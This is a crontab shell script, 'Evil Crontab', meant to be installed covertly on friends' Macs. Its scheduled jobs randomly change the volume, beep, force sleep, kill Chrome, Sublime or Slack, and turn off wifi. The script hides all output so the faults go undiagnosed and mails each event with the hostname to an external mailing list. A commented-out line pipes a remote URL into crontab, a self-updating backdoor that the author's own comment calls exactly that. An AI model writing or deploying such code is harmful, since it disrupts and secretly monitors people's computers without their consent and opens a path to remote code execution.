#!/bin/bash
#
# Evil Crontab™
# Meant to be installed on the machines of your unsuspecting friends.
# Designed to be subtle in its evilness, and aims to have its effects
# go not unnoticed, but undiagnosed for as long as possible.
#
# Features:
# - Runs silently, and gets rid of all outputs.
# - Sends notifications to the EvilCrontab mailing list
#
# Format:
# - do_evil_thing && mail notifs
#
# Older format was to wait for a bit to make action irregular and consequently
# harder to debug, but that made the actions too slow, and I want faster results.
# Noting the sleep command here anyway for reference:
# # Wait for a random time unto 30 minutes
# sleep $(((15 * 60) + (RANDOM * 30 * 60 / 32767)))

################################################################################

# Keep changing the volume
*/5 * * * * osascript -e "set Volume $((RANDOM * 10 / 32767))"

# Make annoying sound once every 10 minutes
*/10 * * * * tput bel

# Go to sleep once every hour
0 * * * * pmset sleepnow > /dev/null 2>&1 && (echo "`date`: Screen went to sleep on $HOSTNAME" | mail -s "EVIL @ $HOSTNAME" evilcrontab@googlegroups.com)

# Kill a app once every three hours
0 */3 * * * apps=('Chrome' 'Sublime' 'Slack') && app=${apps[$RANDOM % ${#apps[@]} ]} && kill -9 $(pgrep $app) && (echo "`date`: An app died on $HOSTNAME" | mail -s "EVIL @ $HOSTNAME" evilcrontab@googlegroups.com)

# Switch off wifi once every three hours
30 */3 * * * networksetup -setairportpower en0 off && (echo "`date`: Wifi turned off on $HOSTNAME" | mail -s "EVIL @ $HOSTNAME" evilcrontab@googlegroups.com)

################################################################################

# Thought of some evil later? That's okay, this crontab fetches and updates itself
#
# Update: Removing this since Nemo says this is basically like adding a backdoor
# into someone else's computer, allowing you to execute arbitrary code at will,
# and would even extend this power to whoever has access to my Github or Heroku.
# Too evil, I think.
# 0 15 * * * * curl -sL evilcrontab.mydomain.com | crontab -
